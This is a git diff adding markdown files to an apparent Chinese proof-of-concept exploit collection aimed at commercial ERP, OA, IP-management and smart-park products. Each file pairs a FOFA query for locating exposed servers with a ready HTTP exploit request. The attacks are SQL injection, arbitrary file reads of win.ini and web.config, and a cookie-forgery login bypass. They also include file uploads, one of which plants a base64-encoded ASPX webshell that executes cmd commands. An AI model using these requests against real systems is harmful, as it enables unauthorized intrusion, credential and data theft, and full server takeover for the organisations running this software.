+将获取到cookie填入下面poc中
+
+```javascript
+POST /page/useractionlist?search=1%25'+and+1%3d(updatexml(0x7e,concat(1,(select+user())),1))+and+'%25%25'+like+'&dpId=1¶ms[]=displayName¶ms[]=userName HTTP/1.1
+Host:
+X-Requested-With: XMLHttpRequest
+Cookie: uid=112; JSESSIONID=8E8A139355E2047CEAC6B307396968A8; languageGlobal=1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+```
+
+![e034ce0d97d2420ea913de1498bfe951.png](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409132251636.png)
+
+![1b610ed8f77245f99e98203c9b8c2f1b.png](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409132249981.png)
\ No newline at end of file
diff --git "a/\345\223\262\351\234\226\346\234\272\346\242\260ERP/\345\223\262\351\234\226\346\234\272\346\242\260ERP\346\216\245\345\217\243DownloadInpFile\345\255\230\345\234\250\344\273\273\346\204\217\346\226\207\344\273\266\350\257\273\345\217\226\346\274\217\346\264\236.md" "b/\345\223\262\351\234\226\346\234\272\346\242\260ERP/\345\223\262\351\234\226\346\234\272\346\242\260ERP\346\216\245\345\217\243DownloadInpFile\345\255\230\345\234\250\344\273\273\346\204\217\346\226\207\344\273\266\350\257\273\345\217\226\346\274\217\346\264\236.md"
new file mode 100644
index 0000000..ccca6f6
--- /dev/null
+++ "b/\345\223\262\351\234\226\346\234\272\346\242\260ERP/\345\223\262\351\234\226\346\234\272\346\242\260ERP\346\216\245\345\217\243DownloadInpFile\345\255\230\345\234\250\344\273\273\346\204\217\346\226\207\344\273\266\350\257\273\345\217\226\346\274\217\346\264\236.md"
@@ -0,0 +1,23 @@
+# 哲霖机械ERP接口DownloadInpFile存在任意文件读取漏洞
+
+哲霖机械ERP DownloadInpFile 接口存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
+
+## fofa
+
+```javascript
+body="Api/UserApi/GetUserName"
+```
+
+## poc
+
+```javascript
+GET /Basics/DownloadInpFile?filePath=C:\windows\win.ini HTTP/1.1
+Host:
+User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/41.0.887.0 Safari/532.1
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+```
+
+![46554740fd4b4fe7abd8dca35c7e629b.png](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409132235284.png)
\ No newline at end of file
diff --git "a/\345\224\257\345\276\263\347\237\245\350\257\206\344\272\247\346\235\203\347\256\241\347\220\206\347\263\273\347\273\237/\345\224\257\345\276\263\347\237\245\350\257\206\344\272\247\346\235\203\347\256\241\347\220\206\347\263\273\347\273\237DownloadFileWordTemplate\346\216\245\345\217\243\345\255\230\345\234\250\346\226\207\344\273\266\350\257\273\345\217\226\346\274\217\346\264\236.md" "b/\345\224\257\345\276\263\347\237\245\350\257\206\344\272\247\346\235\203\347\256\241\347\220\206\347\263\273\347\273\237/\345\224\257\345\276\263\347\237\245\350\257\206\344\272\247\346\235\203\347\256\241\347\220\206\347\263\273\347\273\237DownloadFileWordTemplate\346\216\245\345\217\243\345\255\230\345\234\250\346\226\207\344\273\266\350\257\273\345\217\226\346\274\217\346\264\236.md"
new file mode 100644
index 0000000..c279ff1
--- /dev/null
+++ "b/\345\224\257\345\276\263\347\237\245\350\257\206\344\272\247\346\235\203\347\256\241\347\220\206\347\263\273\347\273\237/\345\224\257\345\276\263\347\237\245\350\257\206\344\272\247\346\235\203\347\256\241\347\220\206\347\263\273\347\273\237DownloadFileWordTemplate\346\216\245\345\217\243\345\255\230\345\234\250\346\226\207\344\273\266\350\257\273\345\217\226\346\274\217\346\264\236.md"
@@ -0,0 +1,30 @@
+# 唯徳知识产权管理系统DownloadFileWordTemplate接口存在文件读取漏洞
+
+唯徳知识产权管理系统 DownloadFileWordTemplate 接口存在文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
+
+## fofa
+
+```javascript
+body="JSCOMM/language.js"
+```
+
+## poc
+
+```javascript
+POST /AutoUpdate/WSFM.asmx HTTP/1.1
+Host:
+Content-Type: text/xml; charset=utf-8
+Content-Length: length
+SOAPAction: "http://tempuri.org/DownloadFileWordTemplate"
+
+
+
+
+
+ ../../web.config
+
+
+
+```
+
+![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409141639464.png)
\ No newline at end of file
diff --git "a/\345\224\257\345\276\263\347\237\245\350\257\206\344\272\247\346\235\203\347\256\241\347\220\206\347\263\273\347\273\237/\345\224\257\345\276\263\347\237\245\350\257\206\344\272\247\346\235\203\347\256\241\347\220\206\347\263\273\347\273\237WSFM.asmx\346\216\245\345\217\243\345\255\230\345\234\250\344\273\273\346\204\217\346\226\207\344\273\266\344\270\212\344\274\240\346\274\217\346\264\236.md" "b/\345\224\257\345\276\263\347\237\245\350\257\206\344\272\247\346\235\203\347\256\241\347\220\206\347\263\273\347\273\237/\345\224\257\345\276\263\347\237\245\350\257\206\344\272\247\346\235\203\347\256\241\347\220\206\347\263\273\347\273\237WSFM.asmx\346\216\245\345\217\243\345\255\230\345\234\250\344\273\273\346\204\217\346\226\207\344\273\266\344\270\212\344\274\240\346\274\217\346\264\236.md"
new file mode 100644
index 0000000..fe67fab
--- /dev/null
+++ "b/\345\224\257\345\276\263\347\237\245\350\257\206\344\272\247\346\235\203\347\256\241\347\220\206\347\263\273\347\273\237/\345\224\257\345\276\263\347\237\245\350\257\206\344\272\247\346\235\203\347\256\241\347\220\206\347\263\273\347\273\237WSFM.asmx\346\216\245\345\217\243\345\255\230\345\234\250\344\273\273\346\204\217\346\226\207\344\273\266\344\270\212\344\274\240\346\274\217\346\264\236.md"
@@ -0,0 +1,35 @@
+# 唯徳知识产权管理系统WSFM.asmx接口存在任意文件上传漏洞
+
+唯徳知识产权管理系统 /AutoUpdate/WSFM.asmx 接口存在任意文件上传漏洞,未经身份验证的攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。
+
+## fofa
+
+```javascript
+body="JSCOMM/language.js"
+```
+
+## poc
+
+```javascript
+POST /AutoUpdate/WSFM.asmx HTTP/1.1
+Host:
+Content-Type: text/xml; charset=utf-8
+Content-Length: length
+SOAPAction: "http://tempuri.org/UploadFileWordTemplate"
+
+
+
+
+
+ PCVAIFBhZ2UgTGFuZ3VhZ2U9IkpzY3JpcHQiIHZhbGlkYXRlUmVxdWVzdD0iZmFsc2UiICU+CjwlCnZhciBjPW5ldyBTeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2Vzc1N0YXJ0SW5mbygiY21kIik7CnZhciBlPW5ldyBTeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcygpOwp2YXIgb3V0OlN5c3RlbS5JTy5TdHJlYW1SZWFkZXIsRUk6U3lzdGVtLklPLlN0cmVhbVJlYWRlcjsKYy5Vc2VTaGVsbEV4ZWN1dGU9ZmFsc2U7CmMuUmVkaXJlY3RTdGFuZGFyZE91dHB1dD10cnVlOwpjLlJlZGlyZWN0U3RhbmRhcmRFcnJvcj10cnVlOwplLlN0YXJ0SW5mbz1jOwpjLkFyZ3VtZW50cz0iL2MgIiArIFJlcXVlc3QuSXRlbVsiY21kIl07CmUuU3RhcnQoKTsKb3V0PWUuU3RhbmRhcmRPdXRwdXQ7CkVJPWUuU3RhbmRhcmRFcnJvcjsKZS5DbG9zZSgpOwpSZXNwb25zZS5Xcml0ZShvdXQuUmVhZFRvRW5kKCkgKyBFSS5SZWFkVG9FbmQoKSk7ClN5c3RlbS5JTy5GaWxlLkRlbGV0ZShSZXF1ZXN0LlBoeXNpY2FsUGF0aCk7ClJlc3BvbnNlLkVuZCgpOyU+
+ /TemplateFiles/rce.aspx
+
+
+
+```
+
+![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409141637528.png)
+
+
+
+文件路径:`\TemplateFiles\rce.aspx`
\ No newline at end of file
diff --git "a/\345\225\206\346\267\267ERP/\345\225\206\346\267\267ERP\347\263\273\347\273\237\346\216\245\345\217\243Operater_Action.aspx\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md" "b/\345\225\206\346\267\267ERP/\345\225\206\346\267\267ERP\347\263\273\347\273\237\346\216\245\345\217\243Operater_Action.aspx\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md"
new file mode 100644
index 0000000..68a47cc
--- /dev/null
+++ "b/\345\225\206\346\267\267ERP/\345\225\206\346\267\267ERP\347\263\273\347\273\237\346\216\245\345\217\243Operater_Action.aspx\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md"
@@ -0,0 +1,23 @@
+## 商混ERP系统接口Operater_Action.aspx存在SQL注入漏洞
+
+商混ERP系统 **Operater_Action.aspx**接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息。
+
+## fofa
+
+```javascript
+title="商混ERP系统"
+```
+
+## poc
+
+```javascript
+GET /Dispatch/Operater_Action.aspx?action=TaskComplete&id=1%27WAITFOR+DELAY+%270:0:5%27-- HTTP/1.1
+Host:
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Connection: close
+```
+
+![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409141642074.png)
\ No newline at end of file
diff --git "a/\345\225\206\346\267\267ERP/\345\225\206\346\267\267ERP\347\263\273\347\273\237\346\216\245\345\217\243StockreceiveEdit.aspx\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md" "b/\345\225\206\346\267\267ERP/\345\225\206\346\267\267ERP\347\263\273\347\273\237\346\216\245\345\217\243StockreceiveEdit.aspx\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md"
new file mode 100644
index 0000000..71c6593
--- /dev/null
+++ "b/\345\225\206\346\267\267ERP/\345\225\206\346\267\267ERP\347\263\273\347\273\237\346\216\245\345\217\243StockreceiveEdit.aspx\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md"
@@ -0,0 +1,21 @@
+## 商混ERP系统接口StockreceiveEdit.aspx存在SQL注入漏洞
+
+商混ERP系统 StockreceiveEdit.aspx 接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息。
+
+## fofa
+```javascript
+title="商混ERP系统"
+```
+
+## poc
+```javascript
+GET /ERP/StockreceiveEdit.aspx?id=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
+Host:
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Connection: close
+```
+
+![84d3ac1b3fae42b6b8c215f24af8f95e.png](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409141641376.png)
diff --git "a/\345\225\206\346\267\267ERP/\345\225\206\346\267\267ERP\347\263\273\347\273\237\346\216\245\345\217\243TaskCarToQueue.aspx\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md" "b/\345\225\206\346\267\267ERP/\345\225\206\346\267\267ERP\347\263\273\347\273\237\346\216\245\345\217\243TaskCarToQueue.aspx\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md"
new file mode 100644
index 0000000..2609cc0
--- /dev/null
+++ "b/\345\225\206\346\267\267ERP/\345\225\206\346\267\267ERP\347\263\273\347\273\237\346\216\245\345\217\243TaskCarToQueue.aspx\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md"
@@ -0,0 +1,21 @@
+## 商混ERP系统接口TaskCarToQueue.aspx存在SQL注入漏洞
+
+商混ERP系统 TaskCarToQueue.aspx 接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息。
+
+## fofa
+```javascript
+title="商混ERP系统"
+```
+
+## poc
+```javascript
+GET /Dispatch/TaskCarToQueue.aspx?action=addqueue&id=%27WAITFOR+DELAY+%270:0:5%27-- HTTP/1.1
+Host:
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Connection: close
+```
+
+![image-20240919110956450](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409191109679.png)
diff --git "a/\345\234\260\345\244\247\344\277\241\346\201\257/\345\234\260\345\244\247\344\277\241\346\201\257-\345\237\272\347\241\200\344\277\241\346\201\257\345\271\263\345\217\260GetImg\344\273\273\346\204\217\346\226\207\344\273\266\350\257\273\345\217\226\346\274\217\346\264\236.md" "b/\345\234\260\345\244\247\344\277\241\346\201\257/\345\234\260\345\244\247\344\277\241\346\201\257-\345\237\272\347\241\200\344\277\241\346\201\257\345\271\263\345\217\260GetImg\344\273\273\346\204\217\346\226\207\344\273\266\350\257\273\345\217\226\346\274\217\346\264\236.md"
new file mode 100644
index 0000000..65e2b2a
--- /dev/null
+++ "b/\345\234\260\345\244\247\344\277\241\346\201\257/\345\234\260\345\244\247\344\277\241\346\201\257-\345\237\272\347\241\200\344\277\241\346\201\257\345\271\263\345\217\260GetImg\344\273\273\346\204\217\346\226\207\344\273\266\350\257\273\345\217\226\346\274\217\346\264\236.md"
@@ -0,0 +1,20 @@
+# 地大信息-基础信息平台GetImg任意文件读取漏洞
+
+地大信息-基础信息平台 GetImg 接口存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取文件、数据库配置文件等等。
+
+## fofa
+
+```javascript
+body="/SystemManage/BaseProject" || title=="基础信息平台"
+```
+
+## poc
+
+```javascript
+GET /SystemManage/BaseProject/GetImg?path=C:\windows\win.ini HTTP/1.1
+Host:
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
+Connection: close
+```
+
+![image-20240918135731789](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409181357847.png)
\ No newline at end of file
diff --git "a/\345\244\247\345\215\216/\345\244\247\345\215\216\346\231\272\346\205\247\345\233\255\345\214\272\347\263\273\347\273\237updateOcx_updateCab.action\345\255\230\345\234\250\344\273\273\346\204\217\346\226\207\344\273\266\344\270\212\344\274\240\346\274\217\346\264\236.md" "b/\345\244\247\345\215\216/\345\244\247\345\215\216\346\231\272\346\205\247\345\233\255\345\214\272\347\263\273\347\273\237updateOcx_updateCab.action\345\255\230\345\234\250\344\273\273\346\204\217\346\226\207\344\273\266\344\270\212\344\274\240\346\274\217\346\264\236.md"
new file mode 100644
index 0000000..a2b6f91
--- /dev/null
+++ "b/\345\244\247\345\215\216/\345\244\247\345\215\216\346\231\272\346\205\247\345\233\255\345\214\272\347\263\273\347\273\237updateOcx_updateCab.action\345\255\230\345\234\250\344\273\273\346\204\217\346\226\207\344\273\266\344\270\212\344\274\240\346\274\217\346\264\236.md"
@@ -0,0 +1,41 @@
+# 大华智慧园区系统updateOcx_updateCab.action存在任意文件上传漏洞
+
+大华智慧园区系统updateOcx_updateCab.action存在任意文件上传漏洞,允许攻击者上传恶意文件到服务器,可能导致远程代码执行、网站篡改或其他形式的攻击,严重威胁系统和数据安全。
+
+## fofa
+
+```javascript
+app="dahua-智慧园区综合管理平台"
+```
+
+## poc
+
+```java
+POST /portal/updateOcx_updateCab.action HTTP/1.1
+Host: xx.xx.xx.xx
+Accept-Encoding: identity
+Content-Length: 429
+Accept-Language: zh-CN,zh;q=0.8
+Accept: */*
+User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
+Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
+Connection: keep-alive
+Referer: http://www.baidu.com
+Cache-Control: max-age=0
+Content-Type: multipart/form-data; boundary=9b1d729ed9954863bcbedbb523cec7fa
+
+--9b1d729ed9954863bcbedbb523cec7fa
+Content-Disposition: form-data; name="updateBean.loadCabFileName"
+
+sAuyJk.jsp
+--9b1d729ed9954863bcbedbb523cec7fa
+Content-Disposition: form-data; name="updateBean.loadCab"; filename="sAuyJk.jsp"
+Content-Type: text/plain
+
+<% out.println(75471+90776+"tnMXedOsifiHeptP");new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
+--9b1d729ed9954863bcbedbb523cec7fa--
+```
+
+文件地址 20240801102132 文件上传时间戳
+
+`http://xx.xx.xx.xx/portal/ocx/20240801102132/sAuyJk.jsp`
\ No newline at end of file
diff --git "a/\345\244\247\345\215\216/\345\244\247\345\215\216\346\231\272\346\205\247\345\233\255\345\214\272\347\263\273\347\273\237updateOcx_updateZip.action\345\255\230\345\234\250\344\273\273\346\204\217\346\226\207\344\273\266\344\270\212\344\274\240\346\274\217\346\264\236.md" "b/\345\244\247\345\215\216/\345\244\247\345\215\216\346\231\272\346\205\247\345\233\255\345\214\272\347\263\273\347\273\237updateOcx_updateZip.action\345\255\230\345\234\250\344\273\273\346\204\217\346\226\207\344\273\266\344\270\212\344\274\240\346\274\217\346\264\236.md"
new file mode 100644
index 0000000..b9f0e9e
--- /dev/null
+++ "b/\345\244\247\345\215\216/\345\244\247\345\215\216\346\231\272\346\205\247\345\233\255\345\214\272\347\263\273\347\273\237updateOcx_updateZip.action\345\255\230\345\234\250\344\273\273\346\204\217\346\226\207\344\273\266\344\270\212\344\274\240\346\274\217\346\264\236.md"
@@ -0,0 +1,41 @@
+# 大华智慧园区系统updateOcx_updateZip.action存在任意文件上传漏洞
+
+大华智慧园区系统updateOcx_updateZip.action存在任意文件上传漏洞,允许攻击者上传恶意文件到服务器,可能导致远程代码执行、网站篡改或其他形式的攻击,严重威胁系统和数据安全。
+
+## fofa
+
+```javascript
+app="dahua-智慧园区综合管理平台"
+```
+
+## poc
+
+```java
+POST /portal/updateOcx_updateZip.action HTTP/1.1
+Host: xx.xx.xx.xx
+Accept-Encoding: identity
+Content-Length: 431
+Accept-Language: zh-CN,zh;q=0.8
+Accept: */*
+User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
+Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
+Connection: keep-alive
+Referer: http://www.baidu.com
+Cache-Control: max-age=0
+Content-Type: multipart/form-data; boundary=9aa1b50e33144fb18837cc97ed863df7
+
+--9aa1b50e33144fb18837cc97ed863df7
+Content-Disposition: form-data; name="updateBean.compressFileName"
+
+KgJrYe.jsp
+--9aa1b50e33144fb18837cc97ed863df7
+Content-Disposition: form-data; name="updateBean.compress"; filename="KgJrYe.jsp"
+Content-Type: text/plain
+
+<% out.println(32461+18843+"eiaDXmEZEvlnjVVz");new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
+--9aa1b50e33144fb18837cc97ed863df7-
+```
+
+文件地址 20240801102132 文件上传时间戳
+
+`http://xx.xx.xx.xx/portal/ocx/20240801102132/KgJrYe.jsp`
\ No newline at end of file
diff --git "a/\345\271\277\350\201\224\350\276\276OA/\345\271\277\350\201\224\350\276\276OA\347\263\273\347\273\237\346\216\245\345\217\243do.asmx\345\255\230\345\234\250\344\273\273\346\204\217\346\226\207\344\273\266\345\206\231\345\205\245\346\274\217\346\264\236.md" "b/\345\271\277\350\201\224\350\276\276OA/\345\271\277\350\201\224\350\276\276OA\347\263\273\347\273\237\346\216\245\345\217\243do.asmx\345\255\230\345\234\250\344\273\273\346\204\217\346\226\207\344\273\266\345\206\231\345\205\245\346\274\217\346\264\236.md"
new file mode 100644
index 0000000..6f94825
--- /dev/null
+++ "b/\345\271\277\350\201\224\350\276\276OA/\345\271\277\350\201\224\350\276\276OA\347\263\273\347\273\237\346\216\245\345\217\243do.asmx\345\255\230\345\234\250\344\273\273\346\204\217\346\226\207\344\273\266\345\206\231\345\205\245\346\274\217\346\264\236.md"
@@ -0,0 +1,62 @@
+# 广联达OA系统接口do.asmx存在任意文件写入漏洞
+
+广联达OA系统接口do.asmx存在任意文件写入漏洞,允许攻击者上传恶意文件到服务器,可能导致远程代码执行、网站篡改或其他形式的攻击,严重威胁系统和数据安全。
+
+## fofa
+
+```javascript
+body="Services/Identification/login.ashx" || header="Services/Identification/login.ashx" || banner="Services/Identification/login.ashx"
+```
+
+## poc
+
+```javascript
+POST /m/mobileAction.ashx/do.asmx?controller=Microsoft.VisualBasic.FileIO.FileSystem%2c%20Microsoft.VisualBasic%2c%20Version%3d8.0.0.0%2c%20Culture%3dneutral%2c%20PublicKeyToken%3db03f5f7f11d50a3a&action=WriteAllBytes HTTP/1.1
+Host:
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
+Accept-Encoding: gzip, deflate, br
+Accept: */*
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Content-Type: application/json
+Connection: close
+
+["\"D:\\\\Program Files (x86)\\\\Glodon\\\\GTP\\\\data\\\\gtp-default\\\\FileStorage\\\\UserFiles\\\\1.asp\"","[60, 37, 32, 82, 101, 115, 112, 111, 110, 115, 101, 46, 87, 114, 105, 116, 101, 40, 34, 72, 101, 108, 108, 111, 44, 32, 87, 111, 114, 108, 100, 34, 41, 32, 37, 62]","false"]
+```
+
+请求体中的上传路径并不通用,需要根据实际环境选择,文件的内容需要转换为ASCII码
+
+```python
+def ascii_to_char(ascii_codes):
+ """将ASCII码列表转换为字符"""
+ return ''.join(chr(code) for code in ascii_codes)
+
+def char_to_ascii(char):
+ """将字符串转换为ASCII码列表"""
+ return [ord(c) for c in char]
+
+def main():
+ print("0 字符转ASCII码")
+ print("1 ASCII码转字符")
+ choice = input("请选择转换类型(0/1): ")
+
+ if choice == '0':
+ # 字符转ASCII码
+ chars = input("请输入要转换的字符: ")
+ ascii_codes = char_to_ascii(chars)
+ print("字符转ASCII码:", ascii_codes)
+ elif choice == '1':
+ # ASCII码转字符
+ ascii_codes_str = input("请输入以逗号分隔的ASCII码(例如:65,66,67): ")
+ ascii_codes = [int(code.strip()) for code in ascii_codes_str.split(',')]
+ converted_chars = ascii_to_char(ascii_codes)
+ print("ASCII码转字符:", converted_chars)
+ else:
+ print("无效的输入,请输入0或1。")
+
+if __name__ == "__main__":
+ main()
+```
+
+![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409141650271.png)
+
+![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409141650535.png)
\ No newline at end of file
diff --git "a/\345\271\277\350\201\224\350\276\276OA/\345\271\277\350\201\224\350\276\276OA\347\263\273\347\273\237\346\216\245\345\217\243do.asmx\345\255\230\345\234\250\344\273\273\346\204\217\346\226\207\344\273\266\350\257\273\345\217\226\346\274\217\346\264\236.md" "b/\345\271\277\350\201\224\350\276\276OA/\345\271\277\350\201\224\350\276\276OA\347\263\273\347\273\237\346\216\245\345\217\243do.asmx\345\255\230\345\234\250\344\273\273\346\204\217\346\226\207\344\273\266\350\257\273\345\217\226\346\274\217\346\264\236.md"
new file mode 100644
index 0000000..3586436
--- /dev/null
+++ "b/\345\271\277\350\201\224\350\276\276OA/\345\271\277\350\201\224\350\276\276OA\347\263\273\347\273\237\346\216\245\345\217\243do.asmx\345\255\230\345\234\250\344\273\273\346\204\217\346\226\207\344\273\266\350\257\273\345\217\226\346\274\217\346\264\236.md"
@@ -0,0 +1,61 @@
+# 广联达OA系统接口do.asmx存在任意文件读取漏洞
+
+广联达OA系统接口` /m/mobileAction.ashx/do.asmx`存在任意文件读取漏洞,可能导致敏感信息泄露、数据盗窃及其他安全风险,从而对系统和用户造成严重危害。
+
+## fofa
+
+```javascript
+body="Services/Identification/login.ashx" || header="Services/Identification/login.ashx" || banner="Services/Identification/login.ashx"
+```
+
+## poc
+
+```javascript
+POST /m/mobileAction.ashx/do.asmx?controller=Microsoft.VisualBasic.FileIO.FileSystem%2c%20Microsoft.VisualBasic%2c%20Version%3d8.0.0.0%2c%20Culture%3dneutral%2c%20PublicKeyToken%3db03f5f7f11d50a3a&action=ReadAllBytes HTTP/1.1
+Host:
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
+Accept-Encoding: gzip, deflate, br
+Accept: */*
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Content-Type: application/json
+Connection: close
+
+["\"C:\\\\Windows\\\\win.ini\""]
+```
+
+![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409141646757.png)
+
+### 解密脚本
+
+```python
+def ascii_to_char(ascii_codes):
+ """将ASCII码列表转换为字符"""
+ return ''.join(chr(code) for code in ascii_codes)
+
+def char_to_ascii(char):
+ """将字符串转换为ASCII码列表"""
+ return [ord(c) for c in char]
+
+def main():
+ print("0 字符转ASCII码")
+ print("1 ASCII码转字符")
+ choice = input("请选择转换类型(0/1): ")
+
+ if choice == '0':
+ # 字符转ASCII码
+ chars = input("请输入要转换的字符: ")
+ ascii_codes = char_to_ascii(chars)
+ print("字符转ASCII码:", ascii_codes)
+ elif choice == '1':
+ # ASCII码转字符
+ ascii_codes_str = input("请输入以逗号分隔的ASCII码(例如:65,66,67): ")
+ ascii_codes = [int(code.strip()) for code in ascii_codes_str.split(',')]
+ converted_chars = ascii_to_char(ascii_codes)
+ print("ASCII码转字符:", converted_chars)
+ else:
+ print("无效的输入,请输入0或1。")
+
+if __name__ == "__main__":
+ main()
+```
+
diff --git "a/\346\212\242\345\215\225\345\210\267\345\215\225\347\263\273\347\273\237/\346\237\220\344\272\214\345\274\200\347\211\210\346\265\267\345\244\226\346\212\242\345\215\225Shua\345\215\225\347\263\273\347\273\237\345\255\230\345\234\250\344\273\273\346\204\217\347\224\250\346\210\267\347\231\273\345\275\225\346\274\217\346\264\236.md" "b/\346\212\242\345\215\225\345\210\267\345\215\225\347\263\273\347\273\237/\346\237\220\344\272\214\345\274\200\347\211\210\346\265\267\345\244\226\346\212\242\345\215\225Shua\345\215\225\347\263\273\347\273\237\345\255\230\345\234\250\344\273\273\346\204\217\347\224\250\346\210\267\347\231\273\345\275\225\346\274\217\346\264\236.md"
new file mode 100644
index 0000000..4775bd0
--- /dev/null
+++ "b/\346\212\242\345\215\225\345\210\267\345\215\225\347\263\273\347\273\237/\346\237\220\344\272\214\345\274\200\347\211\210\346\265\267\345\244\226\346\212\242\345\215\225Shua\345\215\225\347\263\273\347\273\237\345\255\230\345\234\250\344\273\273\346\204\217\347\224\250\346\210\267\347\231\273\345\275\225\346\274\217\346\264\236.md"
@@ -0,0 +1,33 @@
+# 某二开版海外抢单Shua单系统存在任意用户登录漏洞
+
+**位于 /index/controller/Base.php 控制器的 __construct 方法作为验证登录控制器,来验证用户是否登录,然而这套系统实际采用两套验证用户的方法,Session和Cookie并存,其中 if (!$uid) { $uid = cookie('user_id'); } 这句话是关键,如果Session中没有发现user_id,那么直接验证Cookie中的user_id,而Cookie是可以伪造的,这里导致漏洞产生。**
+
+## fofa
+
+```javascript
+"/red/popper.min.js"
+```
+
+## poc
+
+```javascript
+GET /index/index HTTP/1.1
+Accept: */*
+Accept-Encoding: gzip, deflate, br, zstd
+Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
+Connection: keep-alive
+Content-Length: 73
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Cookie: user_id=1
+Host: 127.0.0.1:81
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
+User-Token-Csrf: csrf66e28d7ebbffaX-Requested-With:
+```
+
+![9eba17aa45f2b298e11a600cd389774d](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409131335933.jpg)
+
+
+
+## 漏洞来源
+
+- https://mp.weixin.qq.com/s/wArXDFITAjeTG0IRA0B5rg
\ No newline at end of file
